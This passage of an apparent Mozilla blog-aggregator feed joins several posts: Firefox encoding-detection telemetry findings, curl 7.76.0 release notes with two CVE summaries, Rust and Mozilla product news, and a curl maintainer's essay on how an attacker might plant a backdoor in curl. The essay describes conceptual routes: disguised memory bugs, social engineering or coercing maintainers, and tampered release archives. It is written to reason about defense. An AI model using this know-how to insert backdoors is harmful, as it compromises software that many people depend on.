  • Does chardetng have to revise its guess often? (That is, is the guess made at one kilobyte typically the same as the guess made at the end of the stream? If not, there’s a reload.) 

  • Does the top-level domain affect the guess often? (If yes, maybe it’s worthwhile to tune this area.) 

  • Is unlabeled UTF-8 so common as to warrant further action to support it? 

  • Is the unlabeled UTF-8 situation different enough for text/html and text/plain to warrant different treatment of text/plain? 

The failure mode of decoding according to the wrong encoding is very different for the Latin script and for non-Latin scripts. Also, there are historical differences in UTF-8 adoption and encoding labeling in different language contexts. For example, UTF-8 adoption happened sooner for the Arabic script and for Vietnamese while Web developers in Poland and Japan had different attitudes towards encoding labeling early on. For this reason, it’s not enough to look at the global aggregation of data alone.

Since Firefox’s encoding behavior no longer depends on the UI locale and a substantial number of users use the en-US localization in non-U.S. contexts, I use geographic location rather than the UI locale as a proxy for the legacy encoding family of the Web content primary being read.

The geographical breakdown of telemetry is presented in the tables by ISO 3166-1 alpha-2 code. The code is deduced from the source IP addresses of the telemetry submissions at the time of ingestion after which the IP address itself is discarded. As another point relevant to make about privacy, the measurements below referring to the .jp, .in, and .lk TLDs is not an indication of URL collection. The split into four coarse categories, .jp, .in+.lk, other ccTLD, and non-ccTLD, was done on the client side as a side effect of these four TLD categories getting technically different detection treatment: .jp has a dedicated detector, .in and .lk don’t run detection at all, for other ccTLDs the TLD is one signal taken into account, and for other TLDs the detection is based on the content only. (It’s imaginable that there could be regional differences in how willing users are to participate in telemetry collection, but I don’t know if there actually are regional differences.)

Menu Usage

Starting with 86, Firefox has a probe that measures if the item “Automatic” in the Text Encoding menu has been used at least once in a given subsession. It also has another probe measuring whether any of the other (manual) items in the Text Encoding menu has been used at least once in a given subsession.

Both the manual selection and the automatic selection are used at the highest rate in Japan. The places with the next-highest usage rates are Hong Kong and Taiwan. The manual selection is still used in more sessions that the automatic selection. In Japan and Hong Kong, the factor is less than 2. In Taiwan, it’s less than 3. In places where the dominant script is the Cyrillic script, manual selection is relatively even more popular. This is understandable, considering that the automatic option is a new piece of UI that users probably haven’t gotten used to, yet.

All in all, the menu is used rarely relative to the total number of subsessions, but I assume the usage rate in Japan still makes the menu worth keeping considering how speedy feedback from Japan is whenever I break something in this area. Even though the menu usage seems very rare, with a large number of users, a notable number of users daily still find the need to use the menu.

Japan is a special case, though, since we have have a dedicated detector that runs on the .jp TLD. The menu usage rates in Hong Kong and Taiwan are pretty close to the rate in Japan, though.

In retrospect, it’s unfortunate that the new probes for menu usage frequency can’t be directly compared with the old probe, because we now have distinct probes for the automatic option being used at least once per subsession and a manual option being used at least once per subsession and both a manual option and the automatic option could be used in the same Firefox subsession. We can calculate changes assuming the extreme cases: the case where the automatic option is always used in a subsession together with a manual option and the case where they are always used in distinct subsessions. This gives us worst case and best case percentages of 86 menu use rate compared to 71 menu use rate. (E.g. 89% means than the menu was used 11% less in 86 than in 71.) The table is sorted by the relative frequency of use of the automatic option in Firefox 86. The table is not exhaustive. It is filtered both to objectively exclude rows by low number of distinct telemetry submitters and semi-subjectively to exclude encoding-wise similar places or places whose results seemed noisy. Also, Germany, India, and Italy are taken as counter-examples of places that are notably apart from the others in terms of menu usage frequency and India being encoding-wise treated specially.

Worst caseBest case

The result is a bit concerning. According to the best case numbers, things got better everywhere except in Ukraine. The worst case numbers suggest that things might have gotten worse also in other places where the Cyrillic script is the dominant script as well as in Turkey and Hungary where  the dominant legacy encoding is known to be tricky to distinguish from windows-1252, and in India, whose domestic ccTLD is excluded from autodetection. Still, the numbers for Russia, Hungary, Turkey, and India look like things might have stayed the same or gotten a bit better.

At least in the case of the Turkish and Hungarian languages, the misdetection of the encoding is going to be another Latin-script encoding anyway, so the result is not catastrophic in terms of user experience. You can still figure out what the text is meant to say. For any non-Latin script, including the Cyrillic script, misdetection makes the page completely unreadable. In that sense, the numbers for Ukraine are concerning.

In the case of India, the domestic ccTLD, .in, is excluded from autodetection and simply falls back to windows-1252 like it used to. Therefore, for users in India, the added autodetection applies only on other TLDs, including to content published from within India on generic TLDs. We can’t really conclude anything in particular about changes to the browser user experience in India itself. However, we can observe that with the exception of Ukraine, the other case where the worst case was over 100%, the worst case was within the same ballpark as the worst case for India, where the worst case may not be meaningful, so maybe the other similar worst case results don’t really indicate things getting substantially worse.

To understand how much menu usage in Ukraine has previously changed from version to version, I looked at the old numbers from Firefox 69, 70, 71, 74, 75, and 75. chardetng landed in Firefox 73 and settled down by Firefox 78. The old telemetry probe expired, which is why we don’t have data from Firefox 85 to compare with.


In the table, the percentage in the cell is the usage rate in the version from the column relative to the version from the row. E.g. in version 70, the usage was 87% of the usage in version 69 and, therefore, decreased by 13%.

This does make even the best-case change from 71 to 86 for Ukraine look like a possible signal and not noise. However, the change from 71 to 74, 75, and 76, representing the original landing of chardetng, was substantially milder. Furthermore, the difference between 69 and 71 was larger, which suggests that the fluctuation between versions may be rather large.

It’s worth noting that with the legacy encoded data synthesized from the Ukrainian Wikipedia, chardetng is 100% accurate with document-length inputs and 98% accurate with title-length inputs. This suggests that the problem might be something that cannot be remedied by tweaking chardetng. Boosting Ukrainian detection without a non-Wikipedia corpus to evaluate with would risk breaking Greek detection (the other non-Latin bicameral script) without any clear metric of how much to boost Ukrainian detection.

Menu Usage Situation

Let’s look at what the situation where the menu (either the automatic option or a manual option) was used was like. This is recorded relative to the top-level page, so this may be misleading if the content that motivate the user to use the menu was actually in a frame.

First, let’s describe the situations. Note that Firefox 86 did not honor bogo-XML declarations in text/html, so documents whose only label was in a bogo-XML declaration count as unlabeled.

The encoding was already manually overridden. That is, the user was unhappy with their previous manual choice. This gives an idea of how users need to iterate with manual choices.
The encoding was already overridden with the automatic option. This suggests that either chardetng guessed wrong or the problem that the user is seeing cannot be remedied by the encoding menu. (E.g. UTF-8 content misdecoded as windows-1252 and then re-encoded as UTF-8 cannot be remedied by any choice from the menu.)
Unlabeled non-UTF-8 content containing non-ASCII was loaded from a ccTLD other than .jp, .in, or .lk, and the TLD influenced chardetng’s decision. That is, the same bytes served from a .com domain would have been detected differently.
Unlabeled non-UTF-8 content containing non-ASCII was loaded from a TLD other than .jp, .in, or .lk, and the TLD did not influence chardetng’s decision. (The TLD may have been either a ccTLD that didn’t end up contributing to the decision or a generic TLD.)
Unlabeled non-UTF-8 content from a file: URL.
Unlabeled (remote; i.e. non-file:) content that was fully ASCII, excluding the .jp, .in, and .lk TLDs. This indicates that either the problem the user attempted to remedy was in a frame or was a problem that the menu cannot remedy.
Unlabeled content (ASCII, UTF-8, or ASCII-compatible legacy) from either the .in or .lk TLDs.
Unlabeled content (ASCII, UTF-8, or ASCII-compatible legacy) from the .jp TLD. The .jp-specific detector, which detects among the three Japanese legacy encodings, ran.
Unlabeled content (outside the .jp, .in, and .lk TLDs) that was actually UTF-8 but was not automatically decoded as UTF-8 to avoid making the Web Platform more brittle. We know that there is an encoding problem for sure and we know that choosing either “Automatic” or “Unicode” from the menu resolves it.
An ASCII-compatible legacy encoding or ISO-2022-JP was declared on the HTTP layer.
UTF-8 was declared on the HTTP layer but the content wasn’t valid UTF-8. (The menu is disabled if the top-level page is declared as UTF-8 and is valid UTF-8.)
An ASCII-compatible legacy encoding or ISO-2022-JP was declared in meta (in the non-file: case).
UTF-8 was declared in meta (in the non-file: case) but the content wasn’t valid UTF-8. (The menu is disabled if the top-level page is declared as UTF-8 and is valid UTF-8.)
An encoding was declared in meta in a document loaded from a file: URL and the actual content wasn’t valid UTF-8. (The menu is disabled if the top-level page is declared as UTF-8 and is valid UTF-8.)
A none-of-the-above situation that was not supposed to happen and, therefore, is a bug in how I set up the telemetry collection.

The cases AutoOverridden, UnlabeledNonUtf8TLD, UnlabeledNonUtf8, and LocalUnlabeled represent cases that are suggestive of chardetng having been wrong (or the user misdiagnosing the situation). These cases together are in the minority relative to the other cases. Notably, their total share is very near the share of UnlabeledAscii, which is probably more indicative of how often users misdiagnose what they see as remedyable via the Text Encoding menu than as indicative of sites using frames. However, I have no proof either way of whether this represents misdiagnosis by the user more often or frames more often. In any case, having potential detector errors be in the same ballbark as cases where the top-level page is actually all-ASCII is a sign of the detector probably being pretty good.

The UnlabeledAscii number for Israel stands out. I have no idea why. Are frames more common there? Is it a common pattern to programmatically convert content to numeric character references? If the input to such conversion has been previously misdecoded, the result looks like an encoding error to the user but cannot be remedied from the menu.

Globally, the dominant case is UnlabeledUtf8. This is sad in the sense that we could automatically fix this case for users if there wasn’t a feedback loop to Web author behavior. See a separate write-up on this topic. Also, this metric stands out for mainland China. We’ll also come back to other metrics related to unlabeled UTF-8 standing out in the case of mainland China.

Mislabeled content is a very substantial reason for overriding the encoding. For the ChannelNonUtf8, MetaNonUtf8, and LocalLabeled the label was either actually wrong or the user misdiagnosed the situation. For the UnlabeledUtf8 and MetaUtf8, we can very confident that there was an actual authoring-side error. Unsurprisingly, overriding an encoding labeled on the HTTP layer is much more common that overriding the encoding labeled within the file. This supports the notion that Ruby’s Postulate is correct.

Note that number for UnlabeledJp in Japan does not indicate that the dedicated Japanese detector is broken. The number could represent unlabeled UTF-8 on the .jp TLD, since the .jp TLD is excluded from the other columns.

The relatively high numbers for ManuallyOverridden indicate that users are rather bad at figuring out on the first attempt what they should choose from the menu. When chardetng would guess right, not giving users the manual option would be an usability improvement. However, in cases where nothing in the menu solves the problem, there’s a cohort of users who are unhappy about software deciding for them that there is no solution and are happier by manually coming to the conclusion that there is no solution. For them, an objective usability improvement could feel patronizing. Obviously, when chardetng would guess wrong, not providing manual recourse would make things substiantially worse.

It’s unclear what one should conclude from the AutoOverridden and LocalUnlabeled numbers. They can represent case where chardetng actually guesses wrong or it could also represent cases where the manual items don’t provide a remedy, either. E.g. none of the menu items remedies UTF-8 having been decoded as windows-1252 and the result having been encoded as UTF-8. The higher numbers for Hong Kong and Taiwan look like a signal of a problem. Because mainland China and Singapore don’t show a similar issue, it’s more likely that the signal for Hong Kong and Taiwan is about Big5 rather than GBK. I find this strange, because Big5 should be structurally distinctive enough for the guess to be right if there is an entire document of data to make the decision from. One possibility is that Big5 extensions, such as Big5-UAO, whose character allocations the Encoding Standard treats as unmapped are more common in legacy content than previously thought. Even one such extension character causes chardetng to reject the document as not Big5. I have previously identified this as a potential risk. Also, it is strange that LocalUnlabeled is notably higher than global also for Singapore, Greece, and Israel, but these don’t show a similar difference on the AutoOverridden side.

The Bug category is concerningly high. What have I missed when writing the collection code? Also, how is it so much higher in Bulgaria?

Non-Menu Detector Outcomes

Next, let’s look an non-menu detection scenarios: What’s the relative frequency of non-file: non-menu non-ASCII chardetng outcomes? (Note that this excludes the .jp, .in, and .lk TLDs. .jp runs a dedicated detector instead of chardetng and no detector runs on .in and .lk.)

Here are the outcomes (note that ASCII-only outcomes are excluded):

The detector knew that the content was UTF-8 and the decision was made from the first kilobyte. (However, a known-wrong TLD-affiliated legacy encoding was used instead in order to avoid making the Web Platform more brittle.)
The detector knew that the content was UTF-8, but the first kilobyte was not enough to decide. That is, the first kilobyte was ASCII. (However, a known-wrong TLD-affiliated legacy encoding was used instead in order to avoid making the Web Platform more brittle.)
The content was non-UTF-8 and the decision was affected by the ccTLD. That is, the same bytes on .com would have been decided differently. The decision that was made once the first kilobyte was seen remained the same when the whole content was seen.
The content was non-UTF-8 and the decision was affected by the ccTLD. That is, the same bytes on .com would have been decided differently. The guess was made once the first kilobyte was seen differed from the eventual decision that was made when the whole content had been seen.
The content was non-UTF-8 on a ccTLD, but the decision was not affected by the TLD. That is, the same content on .com would have been decided the same way. The decision that was made once the first kilobyte was seen remained the same when the whole content was seen.
The content was non-UTF-8 on a ccTLD, but the decision was not affected by the TLD. That is, the same content on .com would have been decided the same way. The guess was made once the first kilobyte was seen differed from the eventual decision that was made when the whole content had been seen.
The content was non-UTF-8 on a generic TLD. The decision that was made once the first kilobyte was seen remained the same when the whole content was seen.
The content was non-UTF-8 on a generic TLD. The guess was made once the first kilobyte was seen differed from the eventual decision that was made when the whole content had been seen.

The rows are grouped by the most detection-relevant legacy encoding family (e.g. Singapore is grouped according to Simplified Chinese) sorted by Windows code page number and the rows within a group are sorted by the ISO 3166 code. The places selected for display are either exhaustive exemplars of a given legacy encoding family or, when not exhaustive, either large-population exemplars or detection-wise remarkable cases. (E.g. Icelandic is detection-wise remarkable, which is why Iceland is shown.)


Simplified ChineseCN13.7%17.3%0.2%0.0%7.0%0.1%61.1%0.6%
Traditional ChineseHK13.5%56.3%0.5%0.0%3.6%0.1%24.4%1.6%
Central EuropeanCZ12.6%49.6%0.7%0.0%33.6%0.1%2.5%0.9%


Simplified ChineseCN14.1%70.6%1.1%0.1%2.7%0.1%10.8%0.6%
Traditional ChineseHK14.0%70.6%0.5%0.1%2.7%0.1%10.8%1.2%
Central EuropeanCZ25.7%69.7%0.9%0.1%1.3%0.0%2.1%0.2%


Recall that for Japan, India, and Sri Lanka, the domestic ccTLDs (.jp, .in, and .lk, respectively) don’t run chardetng, and the table above covers only chardetng outcomes. Armenia, Ethiopia, and Georgia are included as examples where, despite chardetng running on the domestic ccTLD, the primary domestic script has no Web Platform-supported legacy encoding.

When the content is not actually UTF-8, the decision is almost always made from the first kilobyte. We can conclude that the chardetng doesn’t reload too much.

GenericFinal for HTML in Egypt is the notable exception. We know from testing with synthetic data that chardetng doesn’t perform well for short inputs of windows-1256. This looks like a real-world confirmation.

The TLD seems to have the most effect in Hungary, which is unsuprising, because it’s hard to make the detector detect Hungarian from the content every time without causing misdetection of other Latin-script encodings.

The most surprising thing in these results is that unlabeled UTF-8 is encountered relatively more commonly than unlabeled legacy encodings, but this is so often detected only after the first kilobyte. If this content was mostly in the primary language of the places listed in the table, UTF-8 should be detected from the first kilobyte. I even re-checked the telemetry collection code on this point to see that the collection works as expected.

Yet, the result of most unlabeled UTF-8 HTML being detected after the first kilobyte repeats all over the world. The notably different case that stands out is mainland China, where the total of unlabeled UTF-8 is lower than elsewhere even if the late detection is still a bit more common than early detection. Since the phenomenon occurs in places where the primary script is not the Latin script but mainland China is different, my current guess is that unlabeled UTF-8 might be dominated by an ad network that operates globally with the exception of mainland China. This result could be caused by ads that have more than a kilobyte of ASCII code and a copyright notice at the end of the file. (Same-origin iframes inherit the encoding from their parent instead of running chardetng. Different-origin iframes, such as ads, could be represented in these numbers, though.)

I think the next step is to limit these probes to top-level navigations only to avoid the participation of ad iframes in these numbers.

Curiously, the late-detected unlabeled UTF-8 phenomenon extends to plain text, too. Advertising doesn’t plausibly explain plain text. This suggest that plain-text loads are dominanted by something other than local-language textual content. To the extent scripts and stylesheets are viewed as documents that are navigated to, one would expect copyright legends to typically appear at the top. Could plain text be dominated by mostly-ASCII English regardless of where in the world users are? The text/plain UTF-8 result for the United Kingdom looks exactly like one would expect for English. But why is the UTF-8 text/plain situation so different from everywhere else in South Korea?


Let’s go back to the questions:

Can We Replace the Text Encoding Menu with a Single Menu Item?

Most likely yes, but before doing so, it’s probably a good idea to make chardetng tolerate Big5 byte pairs that conform to the Big5 byte pattern but that are unmapped in terms of the Encoding Standard.

Replacing the Text Encoding menu would probably improve usability considering how the telemetry suggests that users are bad at making the right choice from the menu and bad at diagnosing whether the problem they are seeing can be addressed by the menu. (If the menu had only the one item, we’d be able to disable the menu more often, since we’d be able to better conclude ahead of time that it won’t have an effect.)

Does chardetng have to revise its guess often?

No. For legacy encodings, one kilobyte is most often enough. It’s not worthwhile to make adjustments here.

Does the Top-Level Domain Affect the Guess Often?

It affects the results often in Hungary, which is expected, but not otherwise. Even though the TLD-based adjustments to detection are embarrassingly ad hoc, the result seems to work well enough that it doesn’t make sense to put effort into tuning this area better.

Is Unlabeled UTF-8 So Common as to Warrant Further Action to Support It?

There is a lot of unlabeled UTF-8 encountered relative to unlabeled non-UTF-8, but the unlabeled UTF-8 doesn’t appear to be normal text in the local language. In particular, the early vs. late detection telemetry doesn’t vary in the expected way when the primary local language is near-ASCII-only and when the primary local language uses a non-Latin script.

More understanding is needed before drawing more conclusions.

Is the Unlabeled UTF-8 Situation Different Enough for text/html and text/plain to Warrant Different Treatment of text/plain?

More understanding is needed before drawing conclusions. The text/plain and text/html cases look strangely similar even though the text/plain cases are unlikely to be explainable as advertising iframes.

Action items

Daniel Stenbergcurl 7.76.0 adds rustls

I’m happy to announce that we yet again completed a full eight week release cycle and as customary, we end it with a fresh release. Enjoy!

Release presentation


the 198th release
6 changes
56 days (total: 8,412)

130 bug fixes (total: 6,812)
226 commits (total: 26,978)
0 new public libcurl function (total: 85)
3 new curl_easy_setopt() option (total: 288)

3 new curl command line option (total: 240)
58 contributors, 34 new (total: 2,356)
24 authors, 11 new (total: 871)
2 security fixes (total: 100)
800 USD paid in Bug Bounties (total: 5,200 USD)


Automatic referer leaks

CVE-2021-22876 is the first curl CVE of 2021.

libcurl did not strip off user credentials from the URL when automatically populating the Referer: HTTP request header field in outgoing HTTP requests, and therefore risks leaking sensitive data to the server that is the target of the second HTTP request.

libcurl automatically sets the Referer: HTTP request header field in outgoing HTTP requests if the CURLOPT_AUTOREFERER option is set. With the curl tool, it is enabled with --referer ";auto".

Rewarded with 800 USD

TLS 1.3 session ticket proxy host mixup

CVE-2021-22890 is a flaw in curl’s OpenSSL backend that allows a malicious HTTPS proxy to trick curl with session tickets and subsequently allow the proxy to MITM the remote server. The problem only exists with OpenSSL and it needs to speak TLS 1.3 with the HTTPS proxy – and the client must accept the proxy’s certificate, which has to be especially crafted for the purpose.

Note that an HTTPS proxy is different than the mode comon HTTP proxy.

The reporter declined offered reward money.


We list 6 “changes” this time around. They are…

support multiple -b parameters

The command line option for setting cookies can now be used multiple times on the command line to specify multiple cookies. Either by setting cookies by name or by providing a name to a file to read cookie data from.

add –fail-with-body

The command line tool has had the --fail option for a very long time. This new option is very similar, but with a significant difference: this new option saves the response body first even if it returns an error due to HTTP response code that is 400 or larger.

add DoH options to disable TLS verification

When telling curl to use DoH to resolve host names, you can now specify that curl should ignore the TLS certificate verification for the DoH server only. Independently of how it treats other TLS servers that might be involved in the transfer.

read and store the HTTP referer header

This is done with the new CURLINFO_REFERER libcurl option and with the command line tool, --write-out '%{referer}‘.

support SCRAM-SHA-1 and SCRAM-SHA-256 for mail auth

For SASL authentication done with mail-using protocols such as IMAP and SMTP.

A rustls backend

A new optional TLS backend. This is provided via crustls, a C API for the rustls TLS library.

Some Interesting bug-fixes

Again we’ve logged over a hundred fixes in a release, so here goes some of my favorite corrections we did this time:

curl: set CURLOPT_NEW_FILE_PERMS if requested

Due to a silly mistake in the previous release, the new --create-file-mode didn’t actually work because it didn’t set the permissions with libcurl properly – but now it does.

share user’s resolve list with DOH handles

When resolving host names with DoH, the transfers done for that purpose now “inherit” the same --resolve info as used for the normal transfer, which I guess most users already just presumed it did…

bump the max HTTP request size to 1MB

Virtually all internal buffers have length restrictions for security and the maximum size we allowed for a single HTTP request was previously 128 KB. A user with a use-case sending a single 300 KB header turned up and now we allow HTTP requests to be up to 1 MB! I can’t recommend doing it, but now at least curl supports it.

allow SIZE to fail when doing (resumed) FTP upload

In a recent change I made SIZE failures get treated as “file not found” error, but it introduced this regression for resumed uploads because when resuming a file upload and there’s nothing uploaded previously, SIZE is then expected to fail and it is fine.

fix memory leak in ftp_done

The torture tests scored another victory when it proved that when the connection failed at just the correct moment after an FTP transfer is complete, curl could skip a free() and leak memory.

fail if HTTP/2 connection is terminated without END_STREAM

When a HTTP/2 connection is (prematurely) terminated, streams over that connection could return “closed” internally without noticing the premature part. As there was no previous END_STREAM message received for the stream(s), curl should consider that an error and now it does.

don’t set KEEP_SEND when there’s no more HTTP/2 data to be sent

A rare race condition in the HTTP/2 code could make libcurl remain expecting to send data when in reality it had already delivered the last chunk.

With HTTP, use credentials from transfer, not connection

Another cleanup in the code that had the potential to get wrong in the future and mostly worked right now due to lucky circumstances. In HTTP each request done can use its own set of credentials, so it is vital to not use “connection bound” credentials but rather the “transfer oriented” set. That way streams and requests using different credentials will work fine over a single connection even when future changes alter code paths.

lib: remove ‘conn->data’ completely

A rather large internal refactor that shouldn’t be visible on the outside to anyone: transfer objects now link to the corresponding connection object like before, but now connection objects do not link to any transfer object. Many transfers can share the same connection.

adapt to OpenSSL v3’s new const for a few API calls

The seemingly never-ending work to make a version 3 of OpenSSL keeps changing the API and curl is adapting accordingly so that we are prepared and well functioning with this version once it ships “for real” in the future.

Close the connection when downgrading from HTTP/2 to HTTP/1

Otherwise libcurl is likely to reuse the same (wrong) connection again in the next transfer attempt since the connection reuse logic doesn’t take downgrades into account!

Cap initial HTTP body data amount during send speed limiting

The rate limiting logic was previously not correctly applied on the initial body chunk that libcurl sends. Like if you’d tell libcurl to send 50K data with CURLOPT_POSTFIELDS and limit the sending rate to 5K/second.

Celebratory drink

I’ll go for an extra fine cup of coffee today after I posted this. I think I’m worth it. I bet you are too. Go ahead and join me: Hooray for another release!

This Week In RustThis Week in Rust 384

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No newsletters this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is tide-acme, a crate for automatic HTTPS certification using Let's Encrypt for Tide.

Thanks to Josh Triplett for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

327 pull requests were merged in the last week

Rust Compiler Performance Triage

A somewhat negative weak for performance where regressions outweigh improvements. Sadly, a lot of the regressions don't seem very straight-forward to understand, and so more investigation will be necessary.

Triage done by @rylev. Revision range: 9b6339e4..4896450

2 Regressions, 2 Improvements, 3 Mixed

2 of them in rollups

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

Upcoming Events

North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs




Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Despite all the negative aspects, I must say that I do generally really like the poll-based approach that Rust is taking. Most of the problems encountered are encountered not because of mistakes, but because no other language really has pushed this principle this far. Programming language design is first and foremost an “artistic” activity, not a technical one, and anticipating the consequences of design choices is almost impossible.

tomaka on medium

Thanks to Michael Howell for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Data@MozillaMaking your Data Work for you with Mozilla Rally

Every week brings new reports of data leaks, privacy violations, rampant misinformation, or discriminatory AIs. It’s frustrating, because we have so little insight into how major technology companies shape our online experiences.  We also don’t understand the extent of data that online companies collect from us. Without meaningful transparency, we will never address the roots of these problems. 

We are exploring ways to change the dynamics of who controls our data and how we understand our everyday online experiences. In the coming weeks we will launch Mozilla Rally, a participatory data science platform for the Mozilla community.  Rally will invite people to put their data to work, not only for themselves, but for a better society.  

Working alongside other mission-aligned partners, we’ll shine a light on the Internet’s big problems.  We’ll explore ideas for new data products that tip the balance back to consumers. And we’ll do all of this out in the open, sharing and documenting every part of our journey together. You can sign up for the Rally waitlist to be notified when we launch.

Stay tuned!

The Mozilla BlogLatest Mozilla VPN features keep your data safe

It’s been less than a year since we launched Mozilla VPN, our fast and easy-to-use Virtual Private Network service brought to you by a trusted name in online consumer security and privacy services. Since then we added our Mozilla VPN service to Mac and Linux platforms, joining our VPN service offerings on Windows, Android and iOS platforms. As restrictions are slowly easing up and people are becoming more comfortable leaving their homes, one of the ways to keep your information safe when you go online is our Mozilla VPN service. Our Mozilla VPN provides encryption and device-level protection of your connection and information when you are on the Web.

Today, we’re launching two new features to give you an added layer of protection with our trusted Mozilla VPN service. Mozilla has a reputation for building products that help you keep your information safe. These new features will help users do the following:

For those who watch out for unsecure networks

If you’re someone who keeps our Mozilla VPN service off and prefers to manually turn it on yourself, this feature will help you out. We’ll notify you when you’ve joined a network that is not password protected or has weak encryptions. By just clicking on the notification you can turn the Mozilla VPN service on, giving you an added layer of protection ensuring every conversation you have is encrypted over the network.  This feature is available on Windows, Linux, Mac, Android and iOS platforms.

For those at home, who want to keep all your devices connected

Occasionally, you might need to print out forms for an upcoming doctor visit or your kid’s worksheets to keep them busy. Now, we’ve added Local Area Network Access, so your devices can talk with each other without having to turn off your VPN. Just make sure that the box is checked in Network Settings when you are on your home network.  This feature is available on Windows, Linux, Mac and Android platforms.

Why use our trusted Mozilla VPN service?

Since our launch last year, we’ve had thousands of people sign up to use our trusted Mozilla VPN service. Mozilla has built a reputation for building products that respect your privacy and keeps your information safe. With Mozilla VPN service you can be sure your activity is encrypted across all applications and websites, whatever device you are on.

With no long-term contracts required, the Mozilla VPN is available for just $4.99 USD per month in the United States, Canada, the United Kingdom, Singapore, Malaysia, and New Zealand. We have plans to expand to other countries this Spring.

We know that it’s more important than ever for you to feel safe, and for you to know that what you do online is your own business. Check out the Mozilla VPN and subscribe today from our website.


The post Latest Mozilla VPN features keep your data safe appeared first on The Mozilla Blog.

Andrew HalberstadtAdvanced Mach Try

Following up last week’s post on some mach try fundamentals, I figured it would be worth posting some actual concrete tips and tricks. So without further ado, here are some things you can do with ./mach try you may not have known about in rapid fire format.

Daniel StenbergHOWTO backdoor curl

I’ve previously blogged about the possible backdoor threat to curl. This post might be a little repeat but also a refresh and renewed take on the subject several years later, in the shadow of the recent PHP backdoor commits of March 28, 2021. Nowadays, “supply chain attacks” is a hot topic.

Since you didn’t read that PHP link: an unknown project outsider managed to push a commit into the PHP master source code repository with a change (made to look as if done by two project regulars) that obviously inserted a backdoor that could execute custom code when a client tickled a modified server the right way.

<figcaption>Partial screenshot of a diff of the offending commit in question</figcaption>

The commits were apparently detected very quickly. I haven’t seen any proper analysis on exactly how they were performed, but to me that’s not the ultimate question. I rather talk and think about this threat in a curl perspective.

PHP is extremely widely used and so is curl, but where PHP is (mostly) server-side running code, curl is client-side.

How to get malicious code into curl

I’d like to think about this problem from an attacker’s point of view. There are but two things an attacker need to do to get a backdoor in and a third adjacent step that needs to happen:

  1. Make a backdoor change that is hard to detect and appears innocent to a casual observer, while actually still being able to do its “job”
  2. Get that changed landed in the master source code repository branch
  3. The code needs to be included in a curl release that is used by the victim/target

These are not simple steps. The third step, getting into a release, is not strictly always necessary because there are sometimes people and organizations that run code off the bleeding edge master repository (against our advice I should add).

Writing the backdoor code

As was seen in this PHP attack, it failed rather miserably at step 1, making the attack code look innocuous, although we can suspect that maybe that was done so on purpose. In 2010 there was a lengthy discussion about an alleged backdoor in OpenBSD’s IPSEC stack that presumably had been in place for years and even while that particular backdoor was never proven to be real, the idea that it can be done certainly is.

Every time we fix a security problem in curl there’s that latent nagging question in the back of our collective minds: was this flaw placed here deliberately? Historically, we’ve not seen any such attacks against curl. I can tell this with a high degree of certainty since almost all of the existing security problems detected and reported in curl was done by me…!

The best attack code would probably do something minor that would have a huge impact in a special context for which the attacker has planned to use it. I mean minor as in doing a NULL-pointer dereference or doing a use-after-free or something. This, because doing a full-fledged generic stack based buffer overflow is much harder to land undetected. Maybe going with a single-byte overwrite outside of a malloc could be the way, like it was back in 2016 when such a flaw in c-ares was used as the first step in a multi-flaw exploit sequence to execute remote code as root on ChromeOS…

Ideally, the commit should also include an actual bug-fix that would be the public facing motivation for it.

Get that code landed in the repo

Okay let’s imagine that you have produced code that actually is a useful bug-fix or feature addition but with an added evil twist, and you want that landed in curl. I can imagine several different theoretical ways to do it:

  1. A normal pull-request and land using the normal means
  2. Tricking or forcing a user with push rights to circumvent the review process
  3. Use a weakness somewhere and land the code directly without involving existing curl team members

The Pull Request method

I’ve never seen this attempted. Submit the pull-request to the project the usual means and argue that the commit fixes a bug – which could be true.

This makes the backdoor patch to have to go through all testing and reviews with flying colors to get merged. I’m not saying this is impossible, but I will claim that it is very hard and also a very big gamble by an attacker. Presumably it is a fairly big job just to get the code for this attack to work, so maybe going with a less risky way to land the code is then preferable? But then which way is likely to have the most reliable outcome?

The tricking a user method

Social engineering is very powerful. I can’t claim that our team is immune to that so maybe there’s a way an outsider could sneak in behind our imaginary personal walls and make us take a shortcut for a made up reason that then would circumvent the project’s review process.

We can even include more forced “convincing” such as direct threats against persons or their families: “push this code or else…”. This way of course cannot be protected against using 2fa, better passwords or things like that. Forcing a users to do it is also likely to eventually get known and then immediately make the commit reverted.

Tricking a user doesn’t make the commit avoid testing and scrutinizing after the fact. When the code has landed, it will be scanned and tested in a hundred CI jobs that include a handful of static code analyzers and memory/address sanitizers.

Tricking a user could land the code, but it can’t make it stick unless the code is written as the perfect stealth change. It really needs to be that good attack code to work out. Additionally: circumventing the regular pull-request + review procedure is unusual so I believe it is likely that such commit will be reviewed and commented on after the fact, and there might then be questions about it and even likely follow-up actions.

The exploiting a weakness method

A weakness in this context could be a security problem in the hosting software or even a rogue admin in the company that hosts the main source code git repo. Something that allows code to get pushed into the code repository without it being the result of one of the existing team members. This seems to be the method that the PHP attack was done through.

This is a hard method as well. Not only does it shortcut reviews, it is also done in the name of someone on the team who knows for sure that they didn’t do the commit, and again, the commit will be tested and poked at anyway.

For all of us who sign our git commits, detecting such a forged commit is easy and quickly done. In the curl project we don’t have mandatory signed commits so the lack of a signature won’t actually block it. And who knows, a weakness somewhere could even possibly find a way to bypass such a requirement.

The skip-git-altogether methods

As I’ve described above, it is really hard even for a skilled developer to write a backdoor and have that landed in the curl git repository and stick there for longer than just a very brief period.

If the attacker instead can just sneak the code directly into a release archive then it won’t appear in git, it won’t get tested and it won’t get easily noticed by team members!

